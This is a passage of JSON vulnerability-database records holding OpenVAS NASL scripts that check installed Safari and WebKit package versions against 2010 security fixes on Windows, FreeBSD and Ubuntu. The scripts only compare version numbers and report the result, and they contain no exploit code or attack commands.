"CVE-2010-1394", "CVE-2010-1399"], "description": "This host is installed with Apple Safari Web Browser and is prone to\n to multiple vulnerabilities.", "modified": "2020-02-28T00:00:00", "published": "2010-06-16T00:00:00", "id": "OPENVAS:1361412562310801362", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801362", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities (June-10)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities (June-10)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801362\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-06-16 08:26:33 +0200 (Wed, 16 Jun 2010)\");\n script_cve_id(\"CVE-2010-1385\", \"CVE-2010-1384\", \"CVE-2010-1390\", \"CVE-2010-1389\",\n \"CVE-2010-1391\", \"CVE-2010-1393\", \"CVE-2010-1392\", \"CVE-2010-1394\",\n \"CVE-2010-1395\", \"CVE-2010-1396\", \"CVE-2010-1398\", \"CVE-2010-1397\",\n \"CVE-2010-1400\", \"CVE-2010-1399\", \"CVE-2010-1401\", \"CVE-2010-1403\",\n \"CVE-2010-1402\", \"CVE-2010-1404\", \"CVE-2010-1406\", \"CVE-2010-1405\",\n \"CVE-2010-1408\", \"CVE-2010-1409\", \"CVE-2010-1410\", \"CVE-2010-1413\",\n \"CVE-2010-1412\", \"CVE-2010-1414\", \"CVE-2010-1416\", \"CVE-2010-1415\",\n \"CVE-2010-1417\", \"CVE-2010-1422\", \"CVE-2010-1750\", \"CVE-2010-1749\",\n \"CVE-2010-1418\", \"CVE-2010-0544\", \"CVE-2010-1419\", \"CVE-2010-1758\",\n \"CVE-2010-1421\", \"CVE-2010-1761\", \"CVE-2010-1759\", \"CVE-2010-1762\",\n \"CVE-2010-1770\", \"CVE-2010-1764\", \"CVE-2010-1774\", \"CVE-2010-1771\",\n \"CVE-2010-2264\");\n script_bugtraq_id(40620);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities (June-10)\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4196\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/40105\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1373\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Jun/1024067.html\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to bypass certain security\n checks, gain knowledge of sensitive information or execute arbitrary code\n by tricking a user into visiting a specially crafted web page.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari version prior to 5.0 (5.33.16.0) on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.0 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari Web Browser and is prone to\n to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"The multiple issues are caused by use-after-free, double free, integer\n truncation, heap overflow, memory corruption, uninitialized memory access,\n input validation and implementation errors in ColorSync and WebKit.\n\n NOTE: For more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"5.33.16.0\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"Safari 5.0 (5.33.16.0)\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1773", "CVE-2010-1501", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1761", "CVE-2010-1665", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-12-27T00:00:00", "published": "2010-07-22T00:00:00", "id": "OPENVAS:136141256231067711", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067711", "type": "openvas", "title": "FreeBSD Ports: webkit-gtk2", "sourceData": "#\n#VID 19419b3b-92bd-11df-b140-0015f2db7bde\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 19419b3b-92bd-11df-b140-0015f2db7bde\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: webkit-gtk2\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://blog.kov.eti.br/?p=116\nhttp://www.vuxml.org/freebsd/19419b3b-92bd-11df-b140-0015f2db7bde.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67711\");\n script_version(\"$Revision: 8250 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 08:29:15 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-22 17:43:43 +0200 (Thu, 22 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-1386\", \"CVE-2010-1392\", \"CVE-2010-1405\", \"CVE-2010-1407\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-1501\", \"CVE-2010-1664\", \"CVE-2010-1665\", \"CVE-2010-1758\", \"CVE-2010-1759\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1762\", \"CVE-2010-1767\", \"CVE-2010-1770\", \"CVE-2010-1771\", \"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1774\", \"CVE-2010-2264\");\n script_name(\"FreeBSD Ports: webkit-gtk2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"webkit-gtk2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.2.3\")<0) {\n txt += 'Package webkit-gtk2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1773", "CVE-2010-1501", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1761", "CVE-2010-1665", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-02-10T00:00:00", "published": "2010-07-22T00:00:00", "id": "OPENVAS:67711", "href": "http://plugins.openvas.org/nasl.php?oid=67711", "type": "openvas", "title": "FreeBSD Ports: webkit-gtk2", "sourceData": "#\n#VID 19419b3b-92bd-11df-b140-0015f2db7bde\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 19419b3b-92bd-11df-b140-0015f2db7bde\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: webkit-gtk2\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://blog.kov.eti.br/?p=116\nhttp://www.vuxml.org/freebsd/19419b3b-92bd-11df-b140-0015f2db7bde.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(67711);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-22 17:43:43 +0200 (Thu, 22 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-1386\", \"CVE-2010-1392\", \"CVE-2010-1405\", \"CVE-2010-1407\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-1501\", \"CVE-2010-1664\", \"CVE-2010-1665\", \"CVE-2010-1758\", \"CVE-2010-1759\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1762\", \"CVE-2010-1767\", \"CVE-2010-1770\", \"CVE-2010-1771\", \"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1774\", \"CVE-2010-2264\");\n script_name(\"FreeBSD Ports: webkit-gtk2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"webkit-gtk2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.2.3\")<0) {\n txt += 'Package webkit-gtk2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:04:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", "CVE-2010-0052", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1409", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-1783", "CVE-2009-2841", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-3113", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1664", "CVE-2010-1387", "CVE-2010-1759", "CVE-2010-2647", "CVE-2010-0650", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-3114", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-0314", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-1790", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-1781", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1665", "CVE-2010-3115", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-0656", "CVE-2010-1812", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-0647", "CVE-2010-1784", "CVE-2010-0053", "CVE-2010-0047", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-3248", "CVE-2010-1762", "CVE-2010-0050", "CVE-2010-1386", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1793"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1006-1", "modified": "2018-01-04T00:00:00", "published": "2010-10-22T00:00:00", "id": "OPENVAS:1361412562310840517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840517", "type": "openvas", "title": "Ubuntu Update for webkit vulnerabilities USN-1006-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1006_1.nasl 8287 2018-01-04 07:28:11Z teissa $\n#\n# Ubuntu Update for webkit vulnerabilities USN-1006-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A large number of security issues were discovered in the WebKit browser and\n JavaScript engines. If a user were tricked into viewing a malicious\n website, a remote attacker could exploit a variety of issues related to web\n browser security, including cross-site scripting attacks, denial of\n service attacks, and arbitrary code execution.\n\n Please consult the bug listed at the top of this advisory to get the exact\n list of CVE numbers fixed for each release.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1006-1\";\ntag_affected = \"webkit vulnerabilities on Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1006-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840517\");\n script_cve_id(\"CVE-2009-2797\",\"CVE-2009-2841\",\"CVE-2010-0046\",\"CVE-2010-0047\",\"CVE-2010-0048\",\"CVE-2010-0049\",\"CVE-2010-0050\",\"CVE-2010-0051\",\"CVE-2010-0052\",\"CVE-2010-0053\",\"CVE-2010-0054\",\"CVE-2010-0314\",\"CVE-2010-0647\",\"CVE-2010-0650\",\"CVE-2010-0651\",\"CVE-2010-0656\",\"CVE-2010-1386\",\"CVE-2010-1387\",\"CVE-2010-1389\",\"CVE-2010-1390\",\"CVE-2010-1391\",\"CVE-2010-1392\",\"CVE-2010-1393\",\"CVE-2010-1394\",\"CVE-2010-1395\",\"CVE-2010-1396\",\"CVE-2010-1397\",\"CVE-2010-1398\",\"CVE-2010-1400\",\"CVE-2010-1401\",\"CVE-2010-1402\",\"CVE-2010-1403\",\"CVE-2010-1404\",\"CVE-2010-1405\",\"CVE-2010-1406\",\"CVE-2010-1407\",\"CVE-2010-1408\",\"CVE-2010-1409\",\"CVE-2010-1410\",\"CVE-2010-1412\",\"CVE-2010-1414\",\"CVE-2010-1415\",\"CVE-2010-1416\",\"CVE-2010-1417\",\"CVE-2010-1418\",\"CVE-2010-1419\",\"CVE-2010-1421\",\"CVE-2010-1422\",\"CVE-2010-1664\",\"CVE-2010-1665\",\"CVE-2010-1758\",\"CVE-2010-1759\",\"CVE-2010-1760\",\"CVE-2010-1761\",\"CVE-2010-1762\",\"CVE-2010-1764\",\"CVE-2010-1766\",\"CVE-2010-1767\",\"CVE-2010-1770\",\"CVE-2010-1771\",\"CVE-2010-1772\",\"CVE-2010-1773\",\"CVE-2010-1774\",\"CVE-2010-1780\",\"CVE-2010-1781\",\"CVE-2010-1782\",\"CVE-2010-1783\",\"CVE-2010-1784\",\"CVE-2010-1785\",\"CVE-2010-1786\",\"CVE-2010-1787\",\"CVE-2010-1788\",\"CVE-2010-1790\",\"CVE-2010-1792\",\"CVE-2010-1793\",\"CVE-2010-1807\",\"CVE-2010-1812\",\"CVE-2010-1814\",\"CVE-2010-1815\",\"CVE-2010-2264\",\"CVE-2010-2647\",\"CVE-2010-2648\",\"CVE-2010-3113\",\"CVE-2010-3114\",\"CVE-2010-3115\",\"CVE-2010-3116\",\"CVE-2010-3248\",\"CVE-2010-3257\",\"CVE-2010-3259\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-22 16:42:09 +0200 (Fri, 22 Oct 2010)\");\n script_xref(name: \"USN\", value: \"1006-1\");\n script_name(\"Ubuntu Update for webkit vulnerabilities USN-1006-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2-dbg\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-dev\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-common\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2-dbg\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-dev\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gir1.0-webkit-1.0\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-common\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:17:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", "CVE-2010-0052", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1409", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-1783", "CVE-2009-2841", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-3113", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1664", "CVE-2010-1387", "CVE-2010-1759", "CVE-2010-2647", "CVE-2010-0650", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-3114", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-0314", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-1790", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-1781", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1665", "CVE-2010-3115", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-0656", "CVE-2010-1812", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-0647", "CVE-2010-1784", "CVE-2010-0053", "CVE-2010-0047", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-3248", "CVE-2010-1762", "CVE-2010-0050", "CVE-2010-1386", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1793"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1006-1", "modified": "2017-12-01T00:00:00", "published": "2010-10-22T00:00:00", "id": "OPENVAS:840517", "href": "http://plugins.openvas.org/nasl.php?oid=840517", "type": "openvas", "title": "Ubuntu Update for webkit vulnerabilities USN-1006-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1006_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for webkit vulnerabilities USN-1006-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A large number of security issues were discovered in the WebKit browser and\n JavaScript engines. If a user were tricked into viewing a malicious\n website, a remote attacker could exploit a variety of issues related to web\n browser security, including cross-site scripting attacks, denial of\n service attacks, and arbitrary code execution.\n\n Please consult the bug listed at the top of this advisory to get the exact\n list of CVE numbers fixed for each release.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1006-1\";\ntag_affected = \"webkit vulnerabilities on Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1006-1/\");\n script_id(840517);\n script_cve_id(\"CVE-2009-2797\",\"CVE-2009-2841\",\"CVE-2010-0046\",\"CVE-2010-0047\",\"CVE-2010-0048\",\"CVE-2010-0049\",\"CVE-2010-0050\",\"CVE-2010-0051\",\"CVE-2010-0052\",\"CVE-2010-0053\",\"CVE-2010-0054\",\"CVE-2010-0314\",\"CVE-2010-0647\",\"CVE-2010-0650\",\"CVE-2010-0651\",\"CVE-2010-0656\",\"CVE-2010-1386\",\"CVE-2010-1387\",\"CVE-2010-1389\",\"CVE-2010-1390\",\"CVE-2010-1391\",\"CVE-2010-1392\",\"CVE-2010-1393\",\"CVE-2010-1394\",\"CVE-2010-1395\",\"CVE-2010-1396\",\"CVE-2010-1397\",\"CVE-2010-1398\",\"CVE-2010-1400\",\"CVE-2010-1401\",\"CVE-2010-1402\",\"CVE-2010-1403\",\"CVE-2010-1404\",\"CVE-2010-1405\",\"CVE-2010-1406\",\"CVE-2010-1407\",\"CVE-2010-1408\",\"CVE-2010-1409\",\"CVE-2010-1410\",\"CVE-2010-1412\",\"CVE-2010-1414\",\"CVE-2010-1415\",\"CVE-2010-1416\",\"CVE-2010-1417\",\"CVE-2010-1418\",\"CVE-2010-1419\",\"CVE-2010-1421\",\"CVE-2010-1422\",\"CVE-2010-1664\",\"CVE-2010-1665\",\"CVE-2010-1758\",\"CVE-2010-1759\",\"CVE-2010-1760\",\"CVE-2010-1761\",\"CVE-2010-1762\",\"CVE-2010-1764\",\"CVE-2010-1766\",\"CVE-2010-1767\",\"C